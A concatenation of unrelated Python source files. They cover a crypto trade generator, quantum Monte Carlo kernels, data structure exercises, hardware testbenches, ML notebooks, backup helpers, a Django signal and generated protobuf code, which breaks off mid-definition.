self.create_action(created_trades, current_ts) created_trades += 1 if save_balances: self.maybe_save_balances(save_ts=current_ts) def query_historical_price(self, from_asset: Asset, to_asset: Asset, timestamp: Timestamp): return PriceHistorian().query_historical_price( from_asset=from_asset, to_asset=to_asset, timestamp=timestamp, ) def increase_asset(self, asset: Asset, amount: FVal, exchange: str) -> None: if asset not in self.funds: self.funds[asset] = amount else: self.funds[asset] += amount getattr(self, exchange).increase_asset(asset, amount) def decrease_asset(self, asset: Asset, amount: FVal, exchange: str) -> None: assert asset in self.funds, 'Asset should exist in funds' assert amount <= self.funds[asset], 'We should have enough funds to decrease asset' self.funds[asset] -= amount getattr(self, exchange).decrease_asset(asset, amount) def get_next_ts(self) -> Tuple[Timestamp, bool, bool]: current_ts = self.current_ts advance_by_secs = min(self.seconds_between_trades, self.seconds_between_balance_save) secs_in_future = random.randint( advance_by_secs, advance_by_secs + MAX_TRADE_DIFF_VARIANCE, ) self.current_ts += secs_in_future save_balances = False if self.current_ts - self.last_balance_save_ts >= self.seconds_between_balance_save: save_balances = True make_trade = False if self.current_ts - self.last_trade_ts >= self.seconds_between_trades: make_trade = True return Timestamp(current_ts), save_balances, make_trade def create_action(self, index: int, ts: Timestamp): """Create a random trade action on a random exchange depending on the funds that are available in that exchange""" # choose an exchange at random exchange_name = random.choice(ALLOWED_EXCHANGES) exchange = getattr(self, exchange_name) # choose a random pair at that exchange pair = exchange.choose_pair( timestamp=ts, price_query=self.query_historical_price, ) print( f'Creating trade {index + 1} / {self.trades_number} in {exchange_name}' f' for the pair: {pair} at timestamp {ts}', ) # depending on our funds decide on what to do. 
Buy/sell base, quote = pair_get_assets(pair) if exchange.get_balance(base) is None: action_type = TradeType.BUY elif exchange.get_balance(quote) is None: action_type = TradeType.SELL else: # TODO: trade the one we have most of action_type = random.choice(list(TradeType)) # if we are buying we are going to spend from the quote asset if action_type == TradeType.BUY: spending_asset = quote else: # selling spends from the base asset spending_asset = base # get a spending asset amount within our per-trade equivalent range and # our available funds spending_usd_rate = self.query_historical_price(spending_asset, A_USD, ts) max_usd_in_spending_asset = spending_usd_rate * exchange.get_balance(spending_asset) max_usd_equivalent_to_spend = min(max_usd_in_spending_asset, MAX_TRADE_USD_VALUE) rate = self.query_historical_price(base, quote, ts) usd_to_spend = FVal(random.uniform(0.01, float(max_usd_equivalent_to_spend))) amount_in_spending_asset = usd_to_spend / spending_usd_rate # if we are buying then the amount is the amount of asset we bought if action_type == TradeType.BUY: amount = amount_in_spending_asset / rate # if we are selling the amount is the spending asset amount else: amount = amount_in_spending_asset quote_asset_usd_rate = self.query_historical_price(quote, A_USD, ts) fee_in_quote_currency = FVal(random.uniform(0, MAX_FEE_USD_VALUE)) / quote_asset_usd_rate # create the trade trade = Trade( timestamp=ts, location=exchange_name, pair=pair, trade_type=action_type, amount=amount, rate=rate, fee=fee_in_quote_currency, fee_currency=quote, link='', notes='', ) logger.info(f'Created trade: {trade}') # Adjust our global and per exchange accounting if action_type == TradeType.BUY: # we buy so we increase our base asset by amount self.increase_asset(base, amount, exchange_name) # and decrease quote by amount * rate self.decrease_asset(quote, amount * rate, exchange_name) else: # we sell so we increase our quote asset self.increase_asset(quote, amount * rate, exchange_name) # and decrease our base asset self.decrease_asset(base, amount, exchange_name) # finally add it to the exchange exchange.append_trade(trade) import torch from torch import nn from .....utils import register_extra_attributes from .jastrow_kernel_electron_electron_base import JastrowKernelElectronElectronBase class PadeJastrowKernel(JastrowKernelElectronElectronBase): def __init__(self, nup, ndown, cuda, w=1.): """Computes the Simple Pade-Jastrow factor .. math:: B_{ij} = \\frac{w_0 r_{ij}}{1 + w r_{ij}} where :math:`w_0` equals 0.5 for parallel spin and 0.25 for antiparallel spin Args: nup (int): number of spin up electons ndow (int): number of spin down electons cuda (bool): Turns GPU ON/OFF. w (float, optional): Value of the variational parameter. Defaults to 1. 
""" super().__init__(nup, ndown, cuda) self.weight = nn.Parameter(torch.as_tensor([w]), requires_grad=True) register_extra_attributes(self, ['weight']) self.static_weight = self.get_static_weight() self.requires_autograd = False def get_static_weight(self): """Get the matrix of static weights Returns: torch.tensor: matrix of the static weights """ bup = torch.cat((0.25 * torch.ones(self.nup, self.nup), 0.5 * torch.ones(self.nup, self.ndown)), dim=1) bdown = torch.cat((0.5 * torch.ones(self.ndown, self.nup), 0.25 * torch.ones(self.ndown, self.ndown)), dim=1) static_weight = torch.cat((bup, bdown), dim=0).to(self.device) mask_tri_up = torch.triu(torch.ones_like( static_weight), diagonal=1).type(torch.BoolTensor).to(self.device) static_weight = static_weight.masked_select(mask_tri_up) return static_weight def forward(self, r): """ Get the jastrow kernel. .. math:: B_{ij} = \\frac{w_0 r_{i,j}}{1+w r_{i,j}} Args: r (torch.tensor): matrix of the e-e distances Nbatch x Nelec x Nelec Returns: torch.tensor: matrix of the jastrow kernels Nbatch x Nelec x Nelec """ return self.static_weight * r / (1.0 + self.weight * r) def compute_derivative(self, r, dr): """Get the elements of the derivative of the jastrow kernels wrt to the first electrons .. math:: \\frac{d B_{ij}}{d k_i} = \\frac{d B_{ij}}{ d k_j } = - \\frac{d B_{ji}}{d k_i} .. math:: \\text{out}_{k,i,j} = A1 + A2 .. math:: A1_{kij} = w0 \\frac{dr_{ij}}{dk_i} \\frac{1}{1 + w r_{ij}} .. math:: A2_{kij} = - w0 w' r_{ij} \\frac{dr_{ij}}{dk_i} \\frac{1}{1 + w r_{ij}}^2 Args: r (torch.tensor): matrix of the e-e distances Nbatch x Nelec x Nelec dr (torch.tensor): matrix of the derivative of the e-e distances Nbatch x Ndim x Nelec x Nelec Returns: torch.tensor: matrix fof the derivative of the jastrow elements Nbatch x Ndim x Nelec x Nelec """ r_ = r.unsqueeze(1) denom = 1. / (1.0 + self.weight * r_) a = self.static_weight * dr * denom b = -self.static_weight * self.weight * r_ * dr * denom**2 return (a + b) def compute_second_derivative(self, r, dr, d2r): """Get the elements of the pure 2nd derivative of the jastrow kernels wrt to the first electron .. math :: \\frac{d^2 B_{ij}}{d k_i^2} = \\frac{d^2 B_{ij}}{d k_j^2} = \\frac{d^2 B_{ji}}{ d k_i^2} Args: r (torch.tensor): matrix of the e-e distances Nbatch x Nelec x Nelec dr (torch.tensor): matrix of the derivative of the e-e distances Nbatch x Ndim x Nelec x Nelec d2r (torch.tensor): matrix of the 2nd derivative of the e-e distances Nbatch x Ndim x Nelec x Nelec Returns: torch.tensor: matrix fof the pure 2nd derivative of the jastrow elements Nbatch x Ndim x Nelec x Nelec """ r_ = r.unsqueeze(1) denom = 1. 
/ (1.0 + self.weight * r_) denom2 = denom**2 dr_square = dr * dr a = self.static_weight * d2r * denom b = -2 * self.static_weight * self.weight * dr_square * denom2 c = -self.static_weight * self.weight * r_ * d2r * denom2 d = 2 * self.static_weight * self.weight**2 * r_ * dr_square * denom**3 return a + b + c + d from typing import Optional, Union class Node: def __init__(self, value: int) -> None: self.value = value self.next = None class LinkedList: def __init__(self, value: int) -> None: new_node = Node(value) self.head = new_node self.tail = new_node self.length = 1 def print_list(self) -> None: temp = self.head while temp is not None: print(temp.value) temp = temp.next def append(self, value: int) -> bool: new_node = Node(value) if self.length == 0: self.head = new_node self.tail = new_node else: self.tail.next = new_node self.tail = new_node self.length += 1 return True def pop(self) -> Union[Node, None]: if self.length == 0: return None temp = self.head pre = self.head while(temp.next): pre = temp temp = temp.next self.tail = pre self.tail.next = None self.length -= 1 if self.length == 0: self.head = None self.tail = None return temp def prepend(self, value: int) -> bool: new_node = Node(value) if self.length == 0: self.head = new_node self.tail = new_node else: new_node.next = self.head self.head = new_node self.length += 1 return True def pop_first(self) -> Union[Node, None]: if self.length == 0: return None temp = self.head self.head = self.head.next temp.next = None self.length -= 1 if self.length == 0: self.tail = None return temp def get(self, index: int) -> Union[Node, None]: if index < 0 or index >= self.length: return None temp = self.head for _ in range(index): temp = temp.next return temp def set_value(self, index: int, value: int) -> bool: temp = self.get(index) if temp: temp.value = value return True return False def insert(self, index: int, value: int) -> bool: if index < 0 or index > self.length: return False if index == 0: return self.prepend(value) if index == self.length: return self.append(value) new_node = Node(value) temp = self.get(index - 1) new_node.next = temp.next temp.next = new_node self.length += 1 return True def remove(self, index: int) -> Union[Node, None]: # index out of bounds if index < 0 or index >= self.length: return None # edge case - remove at start if index == 0: return self.pop_first() # edge case - remove at end if index == self.length - 1: return self.pop() # remove in middle pre = self.get(index - 1) temp = pre.next pre.next = temp.next temp.next = None self.length -= 1 return temp my_linked_list = LinkedList(11) my_linked_list.append(3) my_linked_list.append(23) my_linked_list.append(7) print(my_linked_list.remove(2), '\n') my_linked_list.print_list() """ STATEMENT Given an array where elements are sorted in ascending order, convert it to a height balanced BST. CLARIFICATIONS - Can we assume that there is no duplicate in the array? Yes. EXAMPLES (needs to be drawn) COMMENTS - The two base cases are empty list, which transforms into None, and single element list, which transforms into a TreeNode. - Then, recursively, the root is the node with (n/2)th value, and then we can recursively call the left and right subtree. 
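- Worked example (added for illustration): for nums = [1, 2, 3, 4, 5], n = 5, so the root takes nums[5 // 2] = 3; [1, 2] is recursively converted into the left subtree and [4, 5] into the right subtree, which keeps the two sides within one node of each other and therefore height balanced.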
""" def sortedArrayToBST(nums): """ :type nums: List[int] :rtype: TreeNode """ if not nums: return None n = len(nums) if n == 1: return TreeNode(nums[0]) root = TreeNode(nums[n/2]) root.left = sortedArrayToBST(nums[:n/2]) root.right = sortedArrayToBST(nums[n/2+1:]) return root # -*- coding: utf-8 -*- ############################################################################### # # Copyright (c) 2019 HERE Europe B.V. # # SPDX-License-Identifier: MIT # License-Filename: LICENSE # ############################################################################### from test import mock_iface from test.utils import (BaseTestAsync, BaseTestWorkerAsync, add_test_fn_params, get_env) from qgis.testing import start_app, unittest from qgis.core import QgsRasterLayer, QgsProject from XYZHubConnector.modules import basemap import os APP_ID=os.environ["APP_ID"] APP_CODE=os.environ["APP_CODE"] app = start_app() class TestBasemap(BaseTestWorkerAsync): def test_basemap(self): iface = mock_iface.make_iface_canvas(self) d = os.path.dirname(basemap.__file__) t = basemap.load_xml(os.path.join(d,"basemap.xml")) lst = list(t.values()) for k,v in t.items(): canvas = mock_iface.show_canvas(iface) canvas.setWindowTitle(k) basemap.add_auth(v,app_id=APP_ID, app_code=APP_CODE) u = basemap.parse_uri(v) self._log_debug(k,u) layer = QgsRasterLayer( u, k, "wms") # QgsProject.instance().addMapLayer(layer) canvas.setLayers([layer]) mock_iface.canvas_zoom_to_layer(canvas, layer) self._wait_async() if __name__ == "__main__": # unittest.main() tests = [ "TestBasemap.test_basemap" ] unittest.main(defaultTest = tests) penberg/corundumfpga/lib/pcie/tb/test_pcie_tag_manager.py1-10 #!/usr/bin/env python """ Copyright (c) 2018 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
""" from myhdl import * import os import axis_ep module = 'pcie_tag_manager' testbench = 'test_%s' % module srcs = [] srcs.append("../rtl/%s.v" % module) srcs.append("../rtl/priority_encoder.v") srcs.append("%s.v" % testbench) src = ' '.join(srcs) build_cmd = "iverilog -o %s.vvp %s" % (testbench, src) def bench(): # Parameters PCIE_TAG_COUNT = 256 PCIE_TAG_WIDTH = (PCIE_TAG_COUNT-1).bit_length() PCIE_EXT_TAG_ENABLE = 1 # Inputs clk = Signal(bool(0)) rst = Signal(bool(0)) current_test = Signal(intbv(0)[8:]) m_axis_tag_ready = Signal(bool(0)) s_axis_tag = Signal(intbv(0)[PCIE_TAG_WIDTH:]) s_axis_tag_valid = Signal(bool(0)) ext_tag_enable = Signal(bool(0)) # Outputs m_axis_tag = Signal(intbv(0)[PCIE_TAG_WIDTH:]) m_axis_tag_valid = Signal(bool(0)) active_tags = Signal(intbv(0)[PCIE_TAG_COUNT:]) # sources and sinks tag_sink_pause = Signal(bool(1)) tag_source = axis_ep.AXIStreamSource() tag_source_logic = tag_source.create_logic( clk, rst, tdata=s_axis_tag, tvalid=s_axis_tag_valid, name='tag_source' ) tag_sink = axis_ep.AXIStreamSink() tag_sink_logic = tag_sink.create_logic( clk, rst, tdata=m_axis_tag, tvalid=m_axis_tag_valid, tready=m_axis_tag_ready, pause=tag_sink_pause, name='tag_sink' ) # DUT if os.system(build_cmd): raise Exception("Error running build command") dut = Cosimulation( "vvp -m myhdl %s.vvp -lxt2" % testbench, clk=clk, rst=rst, current_test=current_test, m_axis_tag=m_axis_tag, m_axis_tag_valid=m_axis_tag_valid, m_axis_tag_ready=m_axis_tag_ready, s_axis_tag=s_axis_tag, s_axis_tag_valid=s_axis_tag_valid, ext_tag_enable=ext_tag_enable, active_tags=active_tags ) @always(delay(4)) def clkgen(): clk.next = not clk @instance def check(): yield delay(100) yield clk.posedge rst.next = 1 yield clk.posedge rst.next = 0 yield clk.posedge yield delay(100) yield clk.posedge # testbench stimulus ext_tag_enable.next = 0 yield clk.posedge print("test 1: activate all tags") current_test.next = 1 tag_sink_pause.next = 0 yield delay(300) tag_sink_pause.next = 1 for k in range(32): assert tag_sink.recv().data[0] == k yield delay(100) yield clk.posedge print("test 2: return and reissue some tags") current_test.next = 2 for k in [2, 4, 6, 8]: tag_source.send([k]) tag_sink_pause.next = 0 yield delay(100) tag_sink_pause.next = 1 for k in [2, 4, 6, 8]: assert tag_sink.recv().data[0] == k yield delay(100) yield clk.posedge print("test 3: activate all extended tags") current_test.next = 3 rst.next = 1 ext_tag_enable.next = 1 yield clk.posedge rst.next = 0 tag_sink_pause.next = 0 yield delay(2100) tag_sink_pause.next = 1 for k in range(256): assert tag_sink.recv().data[0] == k yield delay(100) yield clk.posedge print("test 4: return and reissue some tags") current_test.next = 4 for k in [10, 20, 30, 40, 50, 60]: tag_source.send([k]) tag_sink_pause.next = 0 yield delay(100) tag_sink_pause.next = 1 for k in [10, 20, 30, 40, 50, 60]: assert tag_sink.recv().data[0] == k yield delay(100) raise StopSimulation return instances() def test_bench(): sim = Simulation(bench()) sim.run() if __name__ == '__main__': print("Running test...") test_bench() """ 从AplhaPose输出json文件中读取pose信息 """ import json import numpy as np def load_json(filename): with open(filename, "r") as fr: data = json.load(fr) return data def save_json(filename, data): with open(filename, "w", encoding="utf-8") as fw: json.dump(data, fw, ensure_ascii=False, indent=4) data = load_json("/home/lwk/github_mine/AlphaPose/examples/res/alphapose-results.json") results = dict() for item in data: image_id = int(item["image_id"].split(".")[0]) pose_2d = 
np.array(item["keypoints"]).reshape(17, 3).tolist() if image_id not in results: results[image_id] = [] results[image_id].append(pose_2d) save_json("1.json", results) prod_regression.py #!/usr/bin/env python # coding: utf-8 # # Tutoriel complet Regression lineaire # ## Utilisation de l'intégration continue # ## Collect data using pandas # In[59]: # modules nécessaires pour le notebook import pandas as pd import matplotlib.pyplot as plt import seaborn as sns from sklearn.linear_model import LinearRegression from sklearn import model_selection from sklearn import metrics # In[60]: # lire le fichier de données #utiliser le param index_col: Column to use as the row labels of the DataFrame df = pd.read_csv('Advertising.csv', index_col=0) df.head() # In[61]: df.describe() # # identification des descripteurs, cible et observations # Quels sont les descripteurs? On a 3 descripteurs dans ce dataset qui sont: # * TV # * Radio # * Newspaper # Quelle est la cible? # * Sales: vente d'un produit # Quelle est la forme ou shape du dataframe? # In[62]: df.shape # On voit que l'on a 200 observations avec 4 colonnes dont 3 sont des descripteurs # # Tracé des relations entre les descripteurs et la cible # In[63]: #utilisation d'une figure avec 3 plots aligné sur une ligne fig, axes = plt.subplots(1,3,sharey=False) df.plot(kind='scatter', x='TV', y='sales', ax=axes[0], figsize=(16,8)) df.plot(kind='scatter', x='radio', y='sales', ax=axes[1], figsize=(16,8)) df.plot(kind='scatter', x='newspaper', y='sales', ax=axes[2], figsize=(16,8)) # On voit au niveau des graphes qu'il existe une certaine relation linéaire entre TV et Sales ainsi que radio et Sales # In[64]: #meme chose mais avec seaborn sns.pairplot(data=df, x_vars=['TV','radio','newspaper'], y_vars='sales', height=7, aspect=0.7) # # Tracé des correlations entre les différents descripteurs et cible # * Cette partie n'a pas encore été faite. # # Développement du modele linear regression # In[65]: cols_predicteurs = ['TV','radio','newspaper'] #predicteurs X = df[cols_predicteurs] y = df.sales # In[66]: #Effectuer la séparation Training-Test X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y , test_size = 0.2, random_state=42) #detail de chacun des sous-dataset print (X_train.shape, y_train.shape) print (X_test.shape, y_test.shape) # In[67]: #estimation des coeeficients du modele lineaire lm = LinearRegression() lm.fit(X_train,y_train) #Afficher les coefficients print(lm.intercept_) print(lm.coef_) # In[68]: #Afficher l'equation list(zip(cols_predicteurs, lm.coef_)) # In[69]: # proceder au test y_pred = lm.predict(X_test) # In[70]: import numpy as np #comparer les valeurs test et prédites test_pred_df = pd.DataFrame( { 'Valeurs test': y_test, 'Valeurs prédites': np.round( y_pred, 2), 'residuels': y_test - y_pred } ) test_pred_df[0:10] # In[71]: # RMSE mse = np.sqrt(metrics.mean_squared_error(y_test, y_pred)) print(np.sqrt(metrics.mean_squared_error(y_test, y_pred))) #Calcul du R-squared r2 = metrics.r2_score(y_test, y_pred) print(r2) # In[72]: # Write scores to a file with open("metrics.txt", 'w') as outfile: outfile.write("MSE: {0:2.1f} \n".format(mse)) outfile.write("R2: {0:2.1f}\n".format(r2)) # In[73]: #Référence: The Elements of Statistical Learning - and Friedman, voir https://web.stanford.edu/~hastie/ElemStatLearn/ #! 
/usr/bin/env python -u # coding=utf-8 import tensorflow as tf import pickle from models import get_base_graph from oracle import TimeOracle from utils import Timer, Timeline, log_progress __author__ = '' class ExperimentResult: def __init__(self, **kwargs): self.times = [] self.metadata = [] self.__dict__.update(kwargs) def save(self, filename): with open(filename, "wb") as fp: pickle.dump(self, fp) def save_time_oracle(self, filename): oracle = TimeOracle() for m in self.metadata: oracle.update(m) oracle.save(filename) class Experiment: def __init__(self, master, workers, base_model, ordering_algorithm, batch_size): self._master = master self._workers = workers self._model = base_model self._batch_size = batch_size self._ordering_algorithm = ordering_algorithm self._train = [] self._loss = [] self.get_model() def _get_scope(self): return "{}-{}".format(self._model, self._ordering_algorithm) def get_model(self): tf.reset_default_graph() worker_devices = [ "/job:worker/task:{worker}".format(worker=w) for w in range(self._workers) ] self._train = [] self._loss = [] scope = self._get_scope() first = True for worker_device in worker_devices: with tf.variable_scope("", reuse=not first): first = False with tf.device(tf.train.replica_device_setter(worker_device=worker_device, ps_tasks=1)): loss_ = get_base_graph(self._model, self._batch_size, scope) self._loss.append(loss_) opt = tf.train.GradientDescentOptimizer(learning_rate=0.001) train_ = opt.minimize(loss_) self._train.append(train_) def run(self, steps, stages=("fw", "train")): ret = [] for stage, target in [("fw", self._loss), ("train", self._train)]: if stage not in stages: continue result = ExperimentResult(workers=self._workers, base_model=self._model, batch_size=self._batch_size, ordering_algorithm=self._ordering_algorithm, stage=stage, steps=steps) with tf.train.MonitoredTrainingSession(master=self._master) as sess: # Warm up run sess.run(target) for _ in log_progress(range(steps)): with Timer() as timer: with Timeline() as timeline: sess.run(target, **timeline.kwargs()) result.times.append(timer.elapsed()) result.metadata.append(timeline.run_metadata) ret.append(result) return ret import os.path import subprocess def rsync_backup(config=None, source="", dest="", logger=None, options='avr'): cmd = 'rsync' if config: # Default is local backup source = config.source_location dest = config.dest_location if config.source_host and config.dest_host: logger.error("You can not have remote source and destination in same job") return False elif config.source_host: source = config.source_host + ':' + config.source_location elif config.dest_host: dest = config.dest_host + ':' + config.dest_location options = config.options _cmd = [cmd, '-' + options, source, dest] logger.debug('Starting rsync subprocess') job = subprocess.run(_cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) if job.returncode == 0: logger.debug(job.stdout.decode("utf-8")) return True else: logger.error("Something failed: ") logger.debug(job.stdout.decode("utf-8")) return False def rclone_backup(config=None, source="", dest="", logger=None, options='--transfers 10'): paths = ['/usr/sbin/rclone', '/usr/bin/rclone', '/snap/bin/rclone'] for path in paths: if os.path.isfile(path): cmd = path logger.debug('Using the %s executabale' % cmd) break # If last entry in paths is not found it is time to fail elif path == paths[-1]: logger.error('Cannot find rclone executable') return False if config: source = config.source_location dest = config.remote_name + ':' + 
config.remote_location options = config.options _cmd = [cmd, 'sync', source, dest] # Inserting options into command array _cmd[2:2] = options.split() else: logger.error("Config file required at this point") return False job = subprocess.run(_cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) if job.returncode == 0: logger.debug(job.stdout.decode("utf-8")) return True else: logger.error("Something failed: ") logger.debug(job.stdout.decode("utf-8")) return False def agent_picker(agent): return agent_declaration.get(agent, rsync_backup) # rsync_backup is default fallback # Add agents to dictionary so it is exported to the main program agent_declaration = { "rsync": rsync_backup, "rclone": rclone_backup } run2.py from pymongo import MongoClient import db, sys, pymongo import os, json, requests, urllib.parse, calendar, time from datetime import datetime client = MongoClient(db.conn_string) db = client.oscar sep = ";" results = [["year","name","won","gross","gross per day","playdays in year","release date"]] # find all nominees for data in db.oscar_nominations_extended.find(): if data["film"]: boxOfficeData = None try: # fetch boxOfficeId url_params = urllib.parse.urlencode({"movie": data["film"], "year": str(data["year"])}) resp = requests.get(url="http://boxofficeid.thomasbrueggemann.com/?" + url_params) boxOfficeData = json.loads(resp.text) if len(boxOfficeData) == 1: boxOfficeData = boxOfficeData[0] boxOfficeData["release"] = datetime.strptime(boxOfficeData["release"], "%Y-%m-%dT%H:%M:%S.000Z") boxOfficeData = db.boxoffice_movies.find_one({"boxOfficeId": boxOfficeData["boxOfficeId"]}) gross = "" grossPerDate = "" playDays = "" releaseDate = "" if boxOfficeData: lastDay = None # find gross at the end of the year if "history" in boxOfficeData: lastDay = boxOfficeData["history"][-1] if lastDay: gross = str(lastDay["grossToDate"]) grossPerDate = str(int(lastDay["grossToDate"] / int(lastDay["dayNumber"]))) playDays = str(lastDay["dayNumber"]) releaseDate = str(boxOfficeData["release"]) result = str(data["year"]) + sep result += boxOfficeData["boxOfficeId"] + sep if data["won"] == True: result += "1" + sep else: result += "0" + sep result += gross + sep result += grossPerDate + sep result += playDays + sep + releaseDate print(result) except: pass #!/usr/bin/env python # -*- coding: utf-8 -*- def f(grid): # 1. Label each connected region of 1s and record its area # points adjacent to (i, j) def neighbor(grid, i, j): for x,y in [(i-1,j), (i+1, j), (i, j-1), (i,j+1)]: if 0<= x < len(grid) and 0<= y < len(grid[0]): yield (x,y) def mark(grid, i, j, num): """ num -> current label """ total = 1 grid[i][j] = num queue = [(i,j)] while queue: a = queue.pop(0) for x,y in neighbor(grid, a[0], a[1]): if grid[x][y] == 1: queue.append((x,y)) grid[x][y] = num total += 1 return total num = 2 record = {} for i in range(len(grid)): for j in range(len(grid[0])): if grid[i][j] == 1: record[num] = mark(grid, i, j, num) num += 1 # 2. Compute the maximum area print(grid) ans = max(record.values() or [0]) for r in range(len(grid)): for c in range(len(grid[1])): if grid[r][c] == 0: seen = {grid[nr][nc] for nr, nc in neighbor(grid, r, c) if grid[nr][nc] > 1} ans = max(ans, 1 + sum(record[i] for i in seen)) return ans grid = [[1, 1], [1, 1]] print(f(grid)) examples/torque_driven_with_contact/non_slipping_constraint.py import biorbd from biorbd_optim import ( Instant, OptimalControlProgram, ConstraintList, Constraint, ObjectiveList, Objective, DynamicsTypeList, DynamicsType, BidirectionalMapping, Mapping, BoundsList, QAndQDotBounds, InitialConditionsList, ShowResult, ) def 
prepare_ocp(model_path, phase_time, number_shooting_points, mu): # --- Options --- # # Model path biorbd_model = biorbd.Model(model_path) tau_min, tau_max, tau_init = -500, 500, 0 tau_mapping = BidirectionalMapping(Mapping([-1, -1, -1, 0]), Mapping([3])) # Add objective functions objective_functions = ObjectiveList() objective_functions.add(Objective.Mayer.MINIMIZE_PREDICTED_COM_HEIGHT, weight=-1) # Dynamics dynamics = DynamicsTypeList() dynamics.add(DynamicsType.TORQUE_DRIVEN_WITH_CONTACT) # Constraints constraints = ConstraintList() constraints.add( Constraint.CONTACT_FORCE_INEQUALITY, direction="GREATER_THAN", instant=Instant.ALL, contact_force_idx=1, boundary=0, ) constraints.add( Constraint.CONTACT_FORCE_INEQUALITY, direction="GREATER_THAN", instant=Instant.ALL, contact_force_idx=2, boundary=0, ) constraints.add( Constraint.NON_SLIPPING, instant=Instant.ALL, normal_component_idx=(1, 2), tangential_component_idx=0, static_friction_coefficient=mu, ) # Path constraint nb_q = biorbd_model.nbQ() nb_qdot = nb_q pose_at_first_node = [0, 0, -0.5, 0.5] # Initialize X_bounds x_bounds = BoundsList() x_bounds.add(QAndQDotBounds(biorbd_model)) x_bounds[0].min[:, 0] = pose_at_first_node + [0] * nb_qdot x_bounds[0].max[:, 0] = pose_at_first_node + [0] * nb_qdot # Initial guess x_init = InitialConditionsList() x_init.add(pose_at_first_node + [0] * nb_qdot) # Define control path constraint u_bounds = BoundsList() u_bounds.add([[tau_min] * tau_mapping.reduce.len, [tau_max] * tau_mapping.reduce.len]) u_init = InitialConditionsList() u_init.add([tau_init] * tau_mapping.reduce.len) # ------------- # return OptimalControlProgram( biorbd_model, dynamics, number_shooting_points, phase_time, x_init, u_init, x_bounds, u_bounds, objective_functions, constraints, tau_mapping=tau_mapping, ) if __name__ == "__main__": model_path = "2segments_4dof_2contacts.bioMod" t = 0.6 ns = 10 mu = 0.2 ocp = prepare_ocp(model_path=model_path, phase_time=t, number_shooting_points=ns, mu=mu) # --- Solve the program --- # sol = ocp.solve(show_online_optim=True) # --- Show results --- # result = ShowResult(ocp, sol) result.animate() from django.conf import settings from django.db.models.signals import post_save from .models import Registration from .tasks import pass_push_apple from .tasks import pass_push_android def post_save_signal_pass_push( instance: settings.PASS_MODEL, created, **kwargs ): """After saving passes""" # Update registered devices registrations = Registration.objects.filter(pass_object=instance) if registrations.exists(): for registration in registrations: try: # android tokens are longer if len(registration.device.push_token) > 100: pass_push_android.delay( registration.device.push_token ) else: # pass_push_apple(pass_) pass_push_apple.delay( registration.device.push_token ) except Exception as e: print(e) if settings.WALLET_ENABLE_NOTIFICATIONS: post_save.connect( post_save_signal_pass_push, sender=settings.PASS_MODEL ) # -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! 
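# NOTE (illustrative, not produced by protoc): once this module is importable
# as common_pb2, the messages declared in common.proto can be built and
# round-tripped with the standard protobuf Python API, e.g.
#     p = common_pb2.Point3D(x=1.0, y=2.0, z=3.0)
#     payload = p.SerializeToString()
#     q = common_pb2.Point3D.FromString(payload)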
# source: common.proto from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor.FileDescriptor( name='common.proto', package='haomo.hios', syntax='proto3', serialized_options=None, serialized_pb=b'\n\x0c\x63ommon.proto\x12\nhaomo.hios\"\x1d\n\x05Vec2d\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\"(\n\x05Vec3d\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\x12\t\n\x01z\x18\x03 \x01(\x01\"3\n\x05Vec4d\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\x12\t\n\x01z\x18\x03 \x01(\x01\x12\t\n\x01\x65\x18\x04 \x01(\x01\"*\n\x07Point3D\x12\t\n\x01x\x18\x01 \x01(\x01\x12\t\n\x01y\x18\x02 \x01(\x01\x12\t\n\x01z\x18\x03 \x01(\x01\"<\n\nQuaternion\x12\n\n\x02qx\x18\x01 \x01(\x01\x12\n\n\x02qy\x18\x02 \x01(\x01\x12\n\n\x02qz\x18\x03 \x01(\x01\x12\n\n\x02qw\x18\x04 \x01(\x01\"4\n\x07RawData\x12\x0c\n\x04\x64\x61ta\x18\x01 \x01(\x0c\x12\x0e\n\x06length\x18\x02 \x01(\x04\x12\x0b\n\x03src\x18\x03 \x03(\tb\x06proto3' ) _VEC2D = _descriptor.Descriptor( name='Vec2d', full_name='haomo.hios.Vec2d', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='x', full_name='haomo.hios.Vec2d.x', index=0, number=1, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='y', full_name='haomo.hios.Vec2d.y', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=28, serialized_end=57, ) _VEC3D = _descriptor.Descriptor( name='Vec3d', full_name='haomo.hios.Vec3d', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='x', 